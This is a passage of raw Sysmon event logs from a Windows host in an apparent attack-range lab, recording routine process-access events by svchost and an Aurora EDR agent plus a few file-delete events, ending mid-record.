12:22:54.894{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.894{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.894{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc 10341000x800000000000000043259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000043242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.751{FE4C2B44-E49E-63C7-4506-00000000AF02}6948ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\187bea4f-b4dc-4faf-b227-c20de0e3d306MD5=2070A6D8906EE7FDE2CB76147E28A621,SHA256=6694A4322A5AE4AE8D46E19AA514C2E6E7D0D7BBF532838784C765F226BB48EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.746{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000043234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.735{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=3EF18C4AFB6B14D2F1EEE9D17E02E40D,SHA256=D58F645C119C8BCE65D3F40DDA5D6D22339551BFA23FE1B7374E08161BC3E476,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.732{FE4C2B44-E49E-63C7-4106-00000000AF02}6820ATTACKRANGE\AdministratorC:\Program 